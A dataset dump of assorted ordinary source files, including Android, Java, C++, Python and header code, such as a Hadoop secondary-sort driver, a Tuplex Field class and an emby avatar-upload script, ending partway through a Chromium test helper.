max_stars_count
int64
301
224k
text
stringlengths
6
1.05M
token_count
int64
3
727k
446
package indi.liyi.viewer.otherui;

import android.content.Context;
import android.view.View;
import android.view.ViewGroup;

/**
 * Base class for a loading-progress indicator.
 * <p>
 * Subclasses supply the concrete view via {@link #createView(Context)} and
 * react to progress changes in {@link #handleProgress(float)}; this class
 * owns attaching the view to a parent and toggling its visibility.
 */
public abstract class ProgressUI {

    // Lazily created indicator view; stays null until init() runs.
    private View indicatorView;

    /**
     * Creates the progress indicator view.
     */
    public abstract View createView(Context context);

    /**
     * Receives progress updates.
     *
     * @param progress value in the range 0-1
     */
    public abstract void handleProgress(float progress);

    /**
     * Lazily creates the indicator and attaches it to the given parent,
     * but only when it is not attached anywhere yet.
     */
    public void init(ViewGroup parent) {
        if (indicatorView == null) {
            indicatorView = createView(parent.getContext());
        }
        if (indicatorView.getParent() == null) {
            parent.addView(indicatorView);
        }
    }

    /** Shows the indicator. No-op before init() has run. */
    public void start() {
        applyVisibility(View.VISIBLE);
    }

    /** Hides the indicator. No-op before init() has run. */
    public void stop() {
        applyVisibility(View.GONE);
    }

    /** Returns the indicator view, or null if it has not been created yet. */
    public View getProgressView() {
        return indicatorView;
    }

    // Shared null-safe visibility toggle used by start()/stop().
    private void applyVisibility(int visibility) {
        if (indicatorView != null) {
            indicatorView.setVisibility(visibility);
        }
    }
}
467
347
#if USE_UIKIT_PUBLIC_HEADERS || !__has_include(<UIKitCore/UIBarButtonItemGroup.h>)
//
//  UIBarButtonItemGroup.h
//  UIKit
//
//  Copyright (c) 2014-2017 Apple Inc. All rights reserved.
//

#import <Foundation/Foundation.h>
#import <UIKit/UIBarButtonItem.h>

NS_ASSUME_NONNULL_BEGIN

NS_CLASS_AVAILABLE_IOS(9_0) @interface UIBarButtonItemGroup : NSObject<NSCoding>

/// Create a new bar button item group with the given items. When bar button item layout is done, either the group's barButtonItems or its representativeItem is displayed (if it exists).
- (instancetype)initWithBarButtonItems:(NSArray<UIBarButtonItem *> *)barButtonItems representativeItem:(nullable UIBarButtonItem *)representativeItem NS_DESIGNATED_INITIALIZER;
- (nullable instancetype)initWithCoder:(NSCoder *)aDecoder NS_DESIGNATED_INITIALIZER;

/// The bar button items associated with this group. Changing these items will affect the bar displaying these items without needing to re-set the groups that are in that bar. Any UIBarButtonItems that are already in a group will be removed from that group.
@property (nonatomic, readwrite, copy) NSArray<UIBarButtonItem *> *barButtonItems;

/// In order to display as many items as possible, bars that support UIBarButtonItemGroup may choose to collapse items associated with groups to the representativeItem specified by the group.
/// A bar will only collapse groups that have a representativeItem set, but may still choose to use an alternate presentation of these items.
/// A UIBarButtonItem may only be either the representativeItem or a member of the barButtonItems of a single UIBarButtonItemGroup and may only represent a single group.
/// If the representativeItem has an action, then that action will be invoked, otherwise the bar will present a standard UI to allow selection of the barButtonItems in the representedItem's group.
@property (nonatomic, readwrite, strong, nullable) UIBarButtonItem *representativeItem;

/// Returns YES if the representativeItem of this group is currently being displayed, rather than its barButtonItems.
@property (nonatomic, readonly, assign, getter = isDisplayingRepresentativeItem) BOOL displayingRepresentativeItem;

@end

@interface UIBarButtonItem (UIBarButtonItemGroup)

/// The group that the UIBarButtonItem is currently associated with, either as a member of the barButtonItems array or as that group's representativeItem.
@property (nonatomic, readonly, weak, nullable) UIBarButtonItemGroup *buttonGroup NS_AVAILABLE_IOS(9_0);

@end

NS_ASSUME_NONNULL_END

#else
#import <UIKitCore/UIBarButtonItemGroup.h>
#endif
721
469
# COLORS GRAY = "rgb(117,117,117)" LIGHT_GRAY = "rgb(224,224,224)" RED = "rgb(217, 46, 28)" TEAL = "rgb(20, 152, 181)" BLUE = "rgb(100, 143, 255)" ORANGE = "rgb(254, 97, 0)" PINK = "rgb(220, 38, 127)" YELLOW = "rgb(255, 176, 0)" PURPLE = "rgb(120, 94, 240)" # NAMED COLORS REFERENCE = GRAY FADED = LIGHT_GRAY THRESHOLD = RED PARITY_PASS = TEAL PARITY_FAIL = THRESHOLD PARITY_RESULT_PALETTE = [PARITY_PASS, PARITY_FAIL] # Colors will be selected for the groups in the chart by the # order that they are in this palette array. Therefore, the # order should maximamize constrast for smaller subsets [1:n]. CATEGORICAL_PALETTE_COLOR_SAFE = [ BLUE, ORANGE, PINK, YELLOW, PURPLE, ] CATEGORICAL_PALETTE_ALTERNATIVE = [ "rgb(106, 172, 250)", "rgb(62, 204, 156)", "rgb(255, 163, 31)", "rgb(255, 109, 135)", "rgb(182, 135, 231)", ] CATEGORICAL_COLOR_PALETTE = CATEGORICAL_PALETTE_COLOR_SAFE
433
335
{
  "word": "Convey",
  "definitions": [
    "Transport or carry to a place.",
    "Make (an idea, impression, or feeling) known or understandable.",
    "Communicate (a message or information)",
    "Transfer the title to (property)"
  ],
  "parts-of-speech": "Verb"
}
133
412
import java.lang.Thread;
import org.cprover.CProver;

/**
 * JBMC concurrency regression fixture: exercises CProver.getCurrentThreadId()
 * inside and outside CProver thread blocks. Several cases are deliberately
 * marked KNOWNBUG — the exact code shape matters to the symex behavior under
 * test, so the bodies must not be restructured.
 */
public class A {
    public static int g;

    // expected verification success
    public void me() {
        int g = CProver.getCurrentThreadId();
        assert(g == 0);
    }

    // expected verification success
    // --
    // KNOWNBUG
    // ---
    // For some reason symex assigns 'g' to zero, even though
    // the only viable assignment should be one.
    // This issue seems to only occur when a variable is
    // assigned inside the local scope of a thread-block.
    //
    // If instead, we call a function from inside the thread-block and
    // then assign 'g' to 1 then as expected the only viable
    // assignment to 'g' is 1 (see 'me4')
    //
    // Seems related to: https://github.com/diffblue/cbmc/issues/1630/
    public void me_bug() {
        CProver.startThread(333);
        int g = 1;
        assert(g == 1);
        CProver.endThread(333);
    }

    // expected verification success
    // --
    // KNOWNBUG: see me_bug()
    public void me2() {
        CProver.startThread(333);
        g = CProver.getCurrentThreadId();
        assert(g == 1);
        CProver.endThread(333);
    }

    // expected verification success
    // --
    // KNOWNBUG: see me_bug()
    public void me3() {
        CProver.startThread(333);
        int i = CProver.getCurrentThreadId();
        assert(g == 1);
        CProver.endThread(333);
    }

    // expected verification success.
    public void me4() {
        CProver.startThread(333);
        check();
        CProver.endThread(333);
    }

    // expected verification success.
    public void me5() {
        me();
        B b = new B();
        Thread tmp = new Thread(b);
        tmp.start();
    }

    // expected verification success.
    public void me6() {
        me();
        C c = new C();
        c.start();
    }

    // Assigns and checks the thread id from a called function (contrast with
    // the in-lined assignments in me_bug/me2/me3 above).
    public void check() {
        g = CProver.getCurrentThreadId();
        assert(g == 1);
    }
}

// Runnable variant, started via new Thread(b).start() in me5().
class B implements Runnable {
    public static int g;

    @Override
    public void run() {
        g = CProver.getCurrentThreadId();
        assert(g == 1);
    }
}

// Thread-subclass variant, started directly in me6().
class C extends Thread {
    public static int g;

    @Override
    public void run() {
        g = CProver.getCurrentThreadId();
        assert(g == 1);
    }
}
802
1,038
package org.dataalgorithms.chap11.projection.secondarysort;

import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.fs.Path;
import org.apache.hadoop.io.Text;
import org.apache.hadoop.mapred.FileInputFormat;
import org.apache.hadoop.mapred.FileOutputFormat;
import org.apache.hadoop.mapred.TextInputFormat;
import org.apache.hadoop.mapred.TextOutputFormat;
import org.apache.hadoop.util.GenericOptionsParser;
import org.apache.hadoop.mapred.JobConf;
import org.apache.hadoop.mapred.JobClient;

import edu.umd.cloud9.io.pair.PairOfLongInt;

import org.apache.log4j.Logger;

import org.dataalgorithms.util.HadoopUtil;

/**
 * MapReduce job for projecting customer transaction data
 * by using MapReduce's "secondary sort" (sort by shuffle function).
 * Note that reducer values arrive sorted by implementing the "secondary sort"
 * design pattern (no data is sorted in memory).
 *
 * @author <NAME>
 *
 */
public class SecondarySortProjectionDriver {

    private static final Logger theLogger = Logger.getLogger(SecondarySortProjectionDriver.class);

    /**
     * Configures and submits the secondary-sort projection job.
     * Usage: SecondarySortProjectionDriver &lt;input&gt; &lt;output&gt;
     * Exits the JVM with 1 on bad arguments, 0 on completion.
     */
    public static void main(String[] args) throws Exception {
        long startTime = System.currentTimeMillis();
        Configuration conf = new Configuration();
        JobConf jobconf = new JobConf(conf, SecondarySortProjectionDriver.class);
        jobconf.setJobName("SecondarySortProjectionDriver");
        String[] otherArgs = new GenericOptionsParser(conf, args).getRemainingArgs();
        if (otherArgs.length != 2) {
            System.err.println("Usage: SecondarySortProjectionDriver <input> <output>");
            System.exit(1);
        }

        // add jars to distributed cache
        HadoopUtil.addJarsToDistributedCache(conf, "/lib/");

        // set mapper/reducer
        jobconf.setMapperClass(SecondarySortProjectionMapper.class);
        jobconf.setReducerClass(SecondarySortProjectionReducer.class);

        // define mapper's output key-value
        jobconf.setMapOutputKeyClass(CompositeKey.class);
        jobconf.setMapOutputValueClass(PairOfLongInt.class);

        // define reducer's output key-value
        jobconf.setOutputKeyClass(Text.class);
        jobconf.setOutputValueClass(Text.class);

        // define I/O
        FileInputFormat.setInputPaths(jobconf, new Path(otherArgs[0]));
        FileOutputFormat.setOutputPath(jobconf, new Path(otherArgs[1]));

        jobconf.setInputFormat(TextInputFormat.class);
        jobconf.setOutputFormat(TextOutputFormat.class);
        jobconf.setCompressMapOutput(true);

        // the following 3 setting are needed for "secondary sorting"
        // Partitioner decides which mapper output goes to which reducer
        // based on mapper output key. In general, different key is in
        // different group (Iterator at the reducer side). But sometimes,
        // we want different key in the same group. This is the time for
        // Output Value Grouping Comparator, which is used to group mapper
        // output (similar to group by condition in SQL). The Output Key
        // Comparator is used during sort stage for the mapper output key.
        jobconf.setPartitionerClass(NaturalKeyPartitioner.class);
        jobconf.setOutputKeyComparatorClass(CompositeKeyComparator.class);
        jobconf.setOutputValueGroupingComparator(NaturalKeyGroupingComparator.class);

        // NOTE(review): JobClient.runJob() already blocks until the job finishes,
        // so the extra waitForCompletion() on the returned RunningJob is redundant
        // (harmless, but could be dropped) — confirm against the Hadoop version in use.
        JobClient.runJob(jobconf).waitForCompletion();

        long elapsedTime = System.currentTimeMillis() - startTime;
        theLogger.info("elapsedTime (in milliseconds): "+ elapsedTime);
        System.exit(0);
    }
}
1,314
778
<filename>tuplex/utils/src/Field.cc //--------------------------------------------------------------------------------------------------------------------// // // // Tuplex: Blazing Fast Python Data Science // // // // // // (c) 2017 - 2021, Tuplex team // // Created by <NAME> first on 1/1/2021 // // License: Apache 2.0 // //--------------------------------------------------------------------------------------------------------------------// #include <Field.h> #include <sstream> #include <iomanip> // gcc fixes, needed for memcpy. Clang does not need those includes #ifdef __GNUC__ #include <cstdlib> #include <cstring> #include <cstdio> #include <string> #include <iostream> #include <Logger.h> #endif namespace tuplex { Field::Field(const double d) { _size = sizeof(double); _type = python::Type::F64; _dValue = d; _isNull = false; } Field::Field(const int64_t i) { _size = sizeof(int64_t); _type = python::Type::I64; _iValue = i; _isNull = false; } Field::Field(const bool b) { _size = sizeof(int64_t); _type = python::Type::BOOLEAN; _iValue = b; _isNull = false; } Field::Field(const std::string &s) { _size = s.length() + 1; _type = python::Type::STRING; _ptrValue = reinterpret_cast<uint8_t*>(new char[_size]); _isNull = false; // safe memory checks if(!_ptrValue) _size = 0; else std::memcpy(_ptrValue, s.c_str(), _size); } Field Field::from_str_data(const std::string &data, const python::Type &type) { Field f; f._size = data.length() + 1; f._type = type; f._ptrValue = reinterpret_cast<uint8_t*>(new char[f._size]); f._isNull = false; // safe memory checks if(!f._ptrValue) f._size = 0; else std::memcpy(f._ptrValue, data.c_str(), f._size); return f; } Field Field::from_str_data(const option<std::string> &data, const python::Type &type) { Field f; f._size = 0; f._ptrValue = nullptr; if(data.has_value()) f = from_str_data(data.value(), type); f._type = python::Type::makeOptionType(type); f._isNull = !data.has_value(); return f; } Field::Field(const Field &other) { _type = 
other._type; _size = other._size; _isNull = other._isNull; // special handling: // ptr type? if(other.hasPtrData()) { assert(other._ptrValue); // memcpy _ptrValue = new uint8_t[_size]; std::memcpy(_ptrValue, other._ptrValue, _size); } else { // primitive val copy (doesn't matter which) _iValue = other._iValue; } } Field::Field(const Tuple &t) { // allocate size and then transfer tuple to ptr _size = sizeof(Tuple); _type = t.getType(); _isNull = false; _ptrValue = reinterpret_cast<uint8_t*>(new Tuple(t)); } Field::Field(const List &l) { // allocate size and then transfer tuple to ptr _size = sizeof(List); _type = l.getType(); _isNull = false; _ptrValue = reinterpret_cast<uint8_t*>(new List(l)); } void Field::tuple_from_vector(const std::vector<Field> &elements) { auto t = Tuple::from_vector(elements); // call here Tuple constructor _size = sizeof(Tuple); _type = t.getType(); _isNull = false; _ptrValue = reinterpret_cast<uint8_t*>(new Tuple(t)); } Field& Field::operator = (const Field &other) { _size = other._size; _isNull = other._isNull; // special handling: // ptr type? if(other.hasPtrData()) { assert(other._ptrValue); releaseMemory(); // memcpy _ptrValue = new uint8_t[_size]; assert(_ptrValue); std::memcpy(_ptrValue, other._ptrValue, _size); } else { // primitive val copy (doesn't matter which) _iValue = other._iValue; } _type = other._type; return *this; } void Field::releaseMemory() { if(hasPtrData()) { if(_ptrValue) { // select correct deletion method! if(_type.withoutOptions().isListType() || _type.withoutOptions().isTupleType()) delete _ptrValue; else delete [] _ptrValue; } _ptrValue = nullptr; } } Field::~Field() { // check for memory related var fields. If so, delete ptr! 
releaseMemory(); } std::string StringFromCJSONKey(const char* keyString, const char type) { assert(keyString); switch(type) { case 's': return "'" + std::string(keyString) + "'"; case 'b': return std::string(keyString); case 'i': return std::string(keyString); case 'f': return std::string(keyString); default: return "badtype"; } } std::string StringFromCJSONVal(const cJSON* obj, const char type) { switch(type) { case 's': return "'" + std::string(obj->valuestring) + "'"; case 'b': return cJSON_IsTrue(obj) ? "True" : "False"; case 'i': return std::to_string((int64_t)(obj->valuedouble)); case 'f': { std::ostringstream oss; // use up to 5 digits for precision // and a non trailing zero format oss << std::setprecision(5) << std::noshowpoint << obj->valuedouble; return oss.str(); } default: return "badtype"; } } std::string PrintCJSONDict(cJSON* dict) { assert(dict); std::string ret = "{"; cJSON *cur_item = dict->child; bool first = true; while(cur_item) { // add the correct comma if(first) first = false; else ret += ","; char *key = cur_item->string; auto keyStr = StringFromCJSONKey(key + 2, key[0]); auto valStr = StringFromCJSONVal(cur_item, key[1]); ret += keyStr + ":" + valStr; cur_item = cur_item->next; } ret += "}"; return ret; } std::string Field::desc() const { if(_isNull) // also holds for NULLVALUE type field. 
return "None"; if(_type == python::Type::PYOBJECT) return "object"; if(_type.isOptionType()) return extractDesc(_type.getReturnType()); return extractDesc(_type); } std::string Field::extractDesc(const python::Type& type) const { if(python::Type::BOOLEAN == type) { if(this->_iValue > 0) return "True"; else return "False"; } else if(python::Type::I64 == type) { return std::to_string(_iValue); } else if(python::Type::F64 == type) { std::ostringstream oss; // use up to 5 digits for precision // and a non trailing zero format oss << std::setprecision(5) << std::fixed << _dValue; return oss.str(); return std::to_string(this->_dValue); } else if(python::Type::STRING == type) { std::string s; s = std::string(reinterpret_cast<char*>(_ptrValue)); return "'" + s + "'"; } else if(type.isTupleType()) { Tuple *t = (Tuple*) this->_ptrValue; return t->desc(); } else if(type.isDictionaryType() || type == python::Type::GENERICDICT) { char *dstr = reinterpret_cast<char*>(_ptrValue); return PrintCJSONDict(cJSON_Parse(dstr)); } else if(type.isListType()) { List *l = (List*)this->_ptrValue; return l->desc(); } else { return "badtype"; } } bool operator == (const Field& lhs, const Field& rhs) { // check if types match if(lhs._type != rhs._type) return false; // check if has ptr data assert(lhs.hasPtrData() == rhs.hasPtrData()); if(lhs.hasPtrData()) { if(lhs._size != rhs._size) return false; // type dependent check if(lhs._type == python::Type::STRING) { // perform string comparison return strcmp((char*)lhs.getPtr(), (char*)rhs.getPtr()) == 0; } else if(lhs._type == python::Type::EMPTYTUPLE || lhs._type == python::Type::EMPTYLIST || lhs._type == python::Type::EMPTYDICT) { return true; } else if(lhs._type.isTupleType()) { Tuple *tr= (Tuple*)lhs.getPtr(); Tuple *tl = (Tuple*)rhs.getPtr(); return *tr == *tl; } else if(lhs._type.isListType()) { List *ll = (List*)lhs.getPtr(); List *lr = (List*)rhs.getPtr(); return *ll == *lr; } else { Logger::instance().defaultLogger().error("trying to 
compare for Field equality of " "Field with type " + lhs._type.desc() +". Not yet implemented"); exit(1); } } else { return lhs._iValue == rhs._iValue; } } // needs to be declared here b.c. of incomplete Tuple Type... Field Field::empty_tuple() { return Field(Tuple()); } Field Field::empty_list() { return Field(List()); } Field Field::upcastTo_unsafe(const Field &f, const python::Type &targetType) { auto t = f.getType(); if(f._type == targetType) return f; // null upcast to any if(f._type == python::Type::NULLVALUE && targetType.isOptionType()) { Field r; r._type = targetType; r._isNull = true; r._size = 0; r._ptrValue = nullptr; return r; } // emptylist to any list if(f._type == python::Type::EMPTYLIST && targetType.isListType()) { // upcast to list throw std::runtime_error("not yet implemented, pls add"); } // emptydict to any dict if(f._type == python::Type::EMPTYDICT && targetType.isDictionaryType()) { // upcast to any dict throw std::runtime_error("not yet implemented, pls add"); } // tuple type, recursive action // is f.type not option and target Type is option? if(!f._type.isOptionType() && targetType.isOptionType()) { Field c = upcastTo_unsafe(f, targetType.elementType()); c._type = targetType; c._isNull = false; // f is not an option type, therefore can't be 0! 
return c; } if(f._type.isOptionType() && targetType.isOptionType()) { auto tmp = f; tmp._type = f._type.getReturnType(); Field c = upcastTo_unsafe(tmp, targetType.elementType()); c._type = targetType; c._isNull = f._isNull; } if(t == python::Type::BOOLEAN) { if(targetType == python::Type::I64) return Field((int64_t)f._iValue); if(targetType == python::Type::F64) return Field((double)f._iValue); } if(t == python::Type::I64 && targetType == python::Type::F64) { return Field((double)f._iValue); } #ifndef NDEBUG throw std::runtime_error("bad field in upcast"); #endif // @TODO: construct dummy based on target type return Field::null(); } Field Field::from_pickled_memory(const uint8_t *buf, size_t buf_size) { assert(buf); Field f; f._isNull = false; f._type = python::Type::PYOBJECT; f._size = buf_size; f._ptrValue = new uint8_t[buf_size]; memcpy(f._ptrValue, buf, buf_size); return f; } }
6,791
1,283
# -*- coding: utf-8 -*-
from PyQt5 import QtCore

# Endpoint settings shared by every service request URL.
server_api_config = {
    "protocol": "http",
    "prefix": "hku",
    "version": "v1",
}


def getserviceUrl(host_url, port, service, api):
    """Build the full REST URL.

    Layout: <protocol>://<host>:<port>/<prefix>/<service>/<version>/<api>
    """
    cfg = server_api_config
    return "{}://{}:{}/{}/{}/{}/{}".format(
        cfg["protocol"], host_url, port, cfg["prefix"], service, cfg["version"], api
    )


def defaultRequestHeader():
    """Return the default HTTP request headers.

    Adds an Accept-Language header when the current Qt locale is Chinese.
    """
    header = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0",
        "Accept-Encoding": "gzip, deflate, br"
    }
    if QtCore.QLocale().language() == QtCore.QLocale.Chinese:
        header["Accept-Language"] = "zh_CN"
    return header
354
809
/**
 * @file
 * @brief Interrupt priority level (IPL) interface for the Xen port.
 *
 * @author <NAME>
 * @date 18.03.2018
 */

#ifndef XEN_IPL_H_
#define XEN_IPL_H_

#ifndef __ASSEMBLER__

/* Opaque saved interrupt state; only ever produced by ipl_save() and
 * consumed by ipl_restore(). */
typedef unsigned char __ipl_t;

/* Initializes IPL handling for this architecture. */
extern void ipl_init(void);

/* Saves the current interrupt state and returns it.
 * NOTE(review): presumably also disables interrupts, as is conventional for
 * ipl_save/ipl_restore pairs — confirm in the arch implementation. */
extern __ipl_t ipl_save(void);

/* Restores an interrupt state previously returned by ipl_save(). */
extern void ipl_restore(__ipl_t ipl);

#endif /* __ASSEMBLER__ */

#endif /* XEN_IPL_H_ */
180
496
/*
 * Licensed to Elasticsearch B.V. under one or more contributor
 * license agreements. See the NOTICE file distributed with
 * this work for additional information regarding copyright
 * ownership. Elasticsearch B.V. licenses this file to you under
 * the Apache License, Version 2.0 (the "License"); you may
 * not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *   http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing,
 * software distributed under the License is distributed on an
 * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
 * KIND, either express or implied.  See the License for the
 * specific language governing permissions and limitations
 * under the License.
 */
package co.elastic.apm.agent.servlet.helper;

import co.elastic.apm.agent.impl.ElasticApmTracer;

import javax.servlet.ServletContext;
import javax.servlet.http.HttpServletRequest;

/**
 * {@code javax.servlet}-flavored transaction creation helper: adapts the
 * generic {@link ServletTransactionCreationHelper} to the javax Servlet API
 * by delegating each accessor to the corresponding
 * {@link HttpServletRequest}/{@link ServletContext} method.
 */
public class JavaxServletTransactionCreationHelper extends ServletTransactionCreationHelper<HttpServletRequest, ServletContext> {

    public JavaxServletTransactionCreationHelper(ElasticApmTracer tracer) {
        super(tracer);
    }

    /** Delegates to {@link HttpServletRequest#getServletPath()}. */
    @Override
    protected String getServletPath(HttpServletRequest httpServletRequest) {
        return httpServletRequest.getServletPath();
    }

    /** Delegates to {@link HttpServletRequest#getPathInfo()}. */
    @Override
    protected String getPathInfo(HttpServletRequest httpServletRequest) {
        return httpServletRequest.getPathInfo();
    }

    /** Delegates to {@link HttpServletRequest#getHeader(String)}. */
    @Override
    protected String getHeader(HttpServletRequest httpServletRequest, String headerName) {
        return httpServletRequest.getHeader(headerName);
    }

    /** Delegates to {@link HttpServletRequest#getServletContext()}. */
    @Override
    protected ServletContext getServletContext(HttpServletRequest httpServletRequest) {
        return httpServletRequest.getServletContext();
    }

    /** Delegates to {@link ServletContext#getClassLoader()}. */
    @Override
    protected ClassLoader getClassLoader(ServletContext servletContext) {
        return servletContext.getClassLoader();
    }

    /** Returns the javax-specific singleton header getter. */
    @Override
    protected CommonServletRequestHeaderGetter getRequestHeaderGetter() {
        return JavaxServletRequestHeaderGetter.getInstance();
    }

    /** Delegates to {@link HttpServletRequest#getContextPath()}. */
    @Override
    protected String getContextPath(HttpServletRequest httpServletRequest) {
        return httpServletRequest.getContextPath();
    }

    /** Delegates to {@link HttpServletRequest#getRequestURI()}. */
    @Override
    protected String getRequestURI(HttpServletRequest httpServletRequest) {
        return httpServletRequest.getRequestURI();
    }
}
750
25,360
<reponame>linzhaojia77/jeecg-boot<gh_stars>1000+ package org.jeecg.common.util; import org.apache.commons.lang3.StringUtils; import org.springframework.web.util.HtmlUtils; /** * HTML 工具类 */ public class HTMLUtils { /** * 获取HTML内的文本,不包含标签 * * @param html HTML 代码 */ public static String getInnerText(String html) { if (StringUtils.isNotBlank(html)) { //去掉 html 的标签 String content = html.replaceAll("</?[^>]+>", ""); // 将多个空格合并成一个空格 content = content.replaceAll("(&nbsp;)+", "&nbsp;"); // 反向转义字符 content = HtmlUtils.htmlUnescape(content); return content.trim(); } return ""; } }
422
370
[ { "role": "WRITER", "userByEmail": "<EMAIL>" }, { "role": "OWNER", "groupByEmail": "<EMAIL>" } ]
65
483
package org.yczbj.ycrefreshviewlib.view;

import android.support.v7.util.DiffUtil;

import java.util.List;
import java.util.Objects;

/**
 * DiffUtil callback comparing an old and a new list of items of generic type T.
 * <p>
 * BUG FIX: both comparison callbacks previously always returned {@code false},
 * which made DiffUtil treat every item as removed + re-inserted (full rebind,
 * no change animations, defeating the purpose of diffing). Without stable ids
 * for a generic T, {@link Objects#equals} is the best available check for both
 * item identity and content equality; items should implement equals()/hashCode().
 */
public class DiffCallBack<T> extends DiffUtil.Callback {

    // Old and new data sets; either may be null (treated as empty).
    private List<T> oldList , newList;

    public DiffCallBack(List<T> oldList , List<T> newList){
        this.oldList = oldList;
        this.newList = newList;
    }

    /**
     * Size of the old data set.
     * @return length, 0 when the list is null
     */
    @Override
    public int getOldListSize() {
        return oldList!=null ? oldList.size() : 0;
    }

    /**
     * Size of the new data set.
     * @return length, 0 when the list is null
     */
    @Override
    public int getNewListSize() {
        return newList!=null ? newList.size() : 0;
    }

    /**
     * Whether the two positions refer to the same logical item.
     * Only called for indices within the sizes reported above, so the lists
     * are non-null here. Null elements compare equal to each other.
     *
     * @param i  position in the old list
     * @param i1 position in the new list
     */
    @Override
    public boolean areItemsTheSame(int i, int i1) {
        return Objects.equals(oldList.get(i), newList.get(i1));
    }

    /**
     * Whether the contents of two items (already deemed the same item)
     * are unchanged; only called when areItemsTheSame returned true.
     *
     * @param i  position in the old list
     * @param i1 position in the new list
     */
    @Override
    public boolean areContentsTheSame(int i, int i1) {
        return Objects.equals(oldList.get(i), newList.get(i1));
    }
}
621
1,064
# -*- coding:utf-8 -*-
# Uploads local actor avatar images ("演员头像" folder) to an emby/jellyfin
# server via its REST API, and writes report files listing which persons
# had a local avatar and which did not.
import requests, os
from configparser import RawConfigParser
from base64 import b64encode
from traceback import format_exc
from json import loads
from os.path import exists

# Check that the avatar folder ("演员头像") sits next to the exe.
# NOTE(review): execution continues even when it is missing — the input() only
# pauses; consider exiting here. TODO confirm intended behavior.
if not exists('演员头像'):
    input('\n“演员头像”文件夹丢失!请把它放进exe的文件夹中!\n')

# Read the config file; this ini stores the user's emby URL and api id.
print('正在读取ini中的设置...')
config_settings = RawConfigParser()
try:
    config_settings.read('【点我设置整理规则】.ini', encoding='utf-8-sig')
    url_emby = config_settings.get("emby/jellyfin", "网址")
    api_key = config_settings.get("emby/jellyfin", "api id")
    bool_replace = True if config_settings.get("emby/jellyfin", "是否覆盖以前上传的头像?") == '是' else False
except:
    url_emby = api_key = ''
    bool_replace = False
    print(format_exc())
    input('无法读取ini文件,请修改它为正确格式,或者打开“【ini】重新创建ini.exe”创建全新的ini!')
print('读取ini文件成功!\n')

# Normalize the user-entered emby URL, with or without a trailing "/".
url_emby = url_emby.strip('/')

# Counters for the summary printed at the end.
num_suc = 0      # avatars successfully uploaded
num_fail = 0     # persons without a local avatar file
num_exist = 0    # persons that already have an avatar in emby
sep = os.sep

try:
    print('正在获取取emby中Persons清单...')
    # curl -X GET "http://localhost:8096/emby/Persons?api_key=<KEY>" -H "accept: application/json"
    # Fetch all "persons": the emby api does not distinguish actors from
    # directors/writers etc., so this returns everyone involved.
    url_emby_persons = f'{url_emby}/emby/Persons?api_key={api_key}'  # &PersonTypes=Actor
    try:
        rqs_emby = requests.get(url=url_emby_persons)
    except requests.exceptions.ConnectionError:
        input(f'无法访问emby服务端,请检查: {url_emby}\n')
    except:
        print(format_exc())
        input(f'发生未知错误,请截图并联系作者: {url_emby}\n')
    # NOTE(review): if the request above raised, rqs_emby is undefined below and
    # the resulting NameError is swallowed by the outer except — consider
    # exiting inside the handlers instead.
    # 401 means the api key is not authorized.
    if rqs_emby.status_code == 401:
        input('请检查api id是否正确!\n')
    # print(rqs_emby.text)
    try:
        list_persons = loads(rqs_emby.text)['Items']
    except:
        list_persons = []
        print(rqs_emby.text)
        print('发生错误!emby返回内容如上: ')
        input('请截图并联系作者!')
    num_persons = len(list_persons)
    print(f'当前有{num_persons}个Person!\n')
    # Truncate both report files, then record for each emby person whether an
    # avatar exists in the "演员头像" folder.
    f_txt = open("已收录的人员清单.txt", 'w', encoding="utf-8")
    f_txt.close()
    f_txt = open("未收录的人员清单.txt", 'w', encoding="utf-8")
    f_txt.close()
    for dic_each_actor in list_persons:
        actor_name = dic_each_actor['Name']
        # Path of the avatar jpg/png inside the "演员头像" folder
        # (sharded by the first character of the name).
        actor_pic_path = f'演员头像{sep}{actor_name[0]}{sep}{actor_name}'
        if exists(f'{actor_pic_path}.jpg'):
            actor_pic_path = f'{actor_pic_path}.jpg'
            header = {"Content-Type": 'image/jpeg', }
        elif exists(f'{actor_pic_path}.png'):
            actor_pic_path = f'{actor_pic_path}.png'
            header = {"Content-Type": 'image/png', }
        else:
            # No local avatar for this person — record and move on.
            print('>>暂无头像: ', actor_name)
            f_txt = open("未收录的人员清单.txt", 'a', encoding="utf-8")
            f_txt.write(f'{actor_name}\n')
            f_txt.close()
            num_fail += 1
            continue
        # The person exists in emby AND the avatar folder has a picture — record it.
        f_txt = open("已收录的人员清单.txt", 'a', encoding="utf-8")
        f_txt.write(f'{actor_name}\n')
        f_txt.close()
        # If emby already has an avatar for this person, skip the upload below
        # unless the user chose to overwrite.
        if dic_each_actor['ImageTags']:
            # emby already has an avatar
            num_exist += 1
            if not bool_replace:
                # not overwriting existing avatars
                continue  # skip the upload step
        f_pic = open(actor_pic_path, 'rb')  # open the image file in binary mode
        b6_pic = b64encode(f_pic.read())  # read it and encode the bytes as base64
        f_pic.close()
        url_post_img = f'{url_emby}/emby/Items/{dic_each_actor["Id"]}/Images/Primary?api_key={api_key}'
        requests.post(url=url_post_img, data=b6_pic, headers=header)
        print('>>设置成功: ', actor_name)
        num_suc += 1
    print('\nemby/jellyfin拥有人员', num_persons, '个!')
    print('已有头像', num_exist, '个!')
    if bool_replace:
        print('当前模式: 覆盖以前上传的头像')
    else:
        print('当前模式: 跳过以前上传的头像')
    print('成功上传', num_suc, '个!')
    print('暂无头像', num_fail, '个!')
    input('已保存至“未收录的人员清单.txt”\n')
except:
    print(format_exc())
    print('发生错误!emby返回内容如上: ')
    input('请截图并联系作者!')
2,852
575
// Copyright 2020 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.

#include "extensions/test/test_background_page_ready_observer.h"

#include "base/bind.h"
#include "content/public/browser/notification_source.h"
#include "content/public/test/test_utils.h"
#include "extensions/browser/extension_registry.h"
#include "extensions/browser/extension_system.h"
#include "extensions/browser/notification_types.h"
#include "extensions/browser/runtime_data.h"
#include "extensions/common/extension.h"
#include "extensions/common/extension_id.h"

namespace extensions {

namespace {

// Returns true iff |extension_id| is installed in |browser_context| and its
// background page is marked ready in the extension system's runtime data.
// Returns false whenever any lookup along the way fails.
bool IsExtensionBackgroundPageReady(
    content::BrowserContext* browser_context,
    const extensions::ExtensionId& extension_id) {
